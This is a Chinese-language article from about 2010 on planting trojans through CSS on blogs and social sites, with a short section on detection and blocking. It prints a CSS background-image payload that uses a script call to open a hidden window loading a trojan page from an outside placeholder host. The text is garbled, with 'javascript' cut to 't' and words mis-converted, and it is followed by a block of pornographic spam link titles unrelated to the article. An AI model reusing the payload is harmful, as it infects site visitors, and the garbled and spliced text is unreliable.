網站制作CSS掛馬攻防實錄
2010/11/15 16:15:24
在Web1.0時代,使用E掛馬對于黑客而言,與其說是為了更好地實現木馬的躲藏,倒不如說是無可奈何的一個選擇。在簡樸的HTML網頁和缺乏交互性的網站中,黑客可以利用的手段也非常有限,即使采取了復雜的偽裝,也很輕易被識破,還不如E來得直接和有效。但如今交互式的Web2.0網站越來越多,答應用戶設置與修改的博客、SNS社區等紛紛泛起。這些互動性非常強的社區和博客中,往往會提供豐碩的功能,并且會答應用戶使用CSS層疊樣式表來對網站制作進行自由的修改,這促使了CSS掛馬流行。
攻CSS掛馬方式較多,但主流的方式是通過有漏洞的博客或者SNS社交網站系統,將惡意的CSS代碼寫入支持CSS功能的個性化頁面中。下面我們以典型的CSS掛馬方式為例進行講解。
方式1:
Body
“background-image”在CSS中的主要功能是用來定義頁面的背景圖片。這是最典型的CSS掛馬方式,這段惡意代碼主要是通過“background-image”配合t代碼讓網頁木馬靜靜地在用戶的電腦中運行。
那如何將這段CSS惡意代碼掛到正常的網頁中去呢?黑客可以將天生好的網頁木馬放到自己指定的位置,然后將該段惡意代碼寫入掛馬網站的網頁中,或者掛馬網頁所調用的CSS文件中。
方式2:
Body
background-image: url(t:open(“http://www.X.com/muma.htm”,”newwindow”,”border=”1″ Height=0, Width=0, top=1000, center=0, toolbar=no,menubar=no, scrollbars=no,resizable=no,location=no,status=no”))
方式1的CSS掛馬技術,在運行時會泛起空缺的頁面,影響網頁訪問者正常的訪問,因此比較輕易發現。不外在方式2中的這段代碼,使用了t的Open開窗,通過新開一個躲藏的窗口,在后臺靜靜地運行新窗口并激活訪問網頁溢出木馬頁面,不會影響訪問者觀看網頁內容,因此更加隱蔽。
防網絡服務器被掛馬,通常會泛起防病毒軟件告警之類的信息。因為漏洞不斷更新,掛馬種類時刻都在變換,通過客戶真個反映來發現服務器是否被掛馬往往疏漏較大。準確的做法是常常檢查服務器日志,發現異常信息,常常檢查網站代碼,使用網頁木馬檢測系統,進行排查。
目前除了使用以前的阻斷彈出窗口防范CSS掛馬之外,還可以在網頁中設置CSS過濾,將CSS過濾掉。不外假如你選擇過濾CSS的話,首先需要注意自己的相關網頁是否有CSS的內容,因此我們仍舊首推用阻斷方式來防范CSS。阻斷代碼如下所示:
emiao1:expression(this.src=”about:blank”,this.outerHTML=”");
將外域的木馬代碼的src重寫本錢地IE404錯誤頁面的地址,這樣,外域的t代碼不會被下載。
返回列表
返回首頁
主站蜘蛛池模板:
国产精品h在线观看|
久久人人爽爽人人爽人人片AV|
精品无码人妻一区二区三区
|
caoporm在线视频|
手机看片日韩福利|
亚洲av无码专区电影在线观看|
浪荡女天天不停挨cao日常视频|
可播放的欧美男男videos|
高清一区二区三区视频|
国产精品不卡视频|
91酒店疯狂输出女神范范|
好吊色青青青国产综合在线观看|
中文字幕色婷婷在线精品中|
日韩高清在线观看|
亚洲国产欧美另类va在线观看|
狠狠色综合久久婷婷|
制服丝袜自拍偷拍|
色妞色视频一区二区三区四区
|
人人爽人人爽人人爽|
精品无码国产自产拍在线观看蜜
|
一本久久伊人热热精品中文|
无敌影视手机在线观看高清|
久久在精品线影院精品国产|
校花哭着扒开屁股浣肠于柔|
亚洲天堂第一区|
毛色毛片免费观看|
人人妻人人做人人爽|
秋霞黄色一级片|
午夜影院在线观看|
老司机激情影院|
国产三级电影在线观看|
香港三级韩国三级人妇三|
国产欧美精品一区二区三区|
1000部免费啪啪十八未年禁止观看
|
亚洲综合色婷婷在线观看|
精品午夜久久福利大片免费|
四虎影院黄色片|
色与欲影视天天看综合网|
国产大秀视频一区二区三区|
麻豆久久婷婷综合五月国产|
国产精品v片在线观看不卡|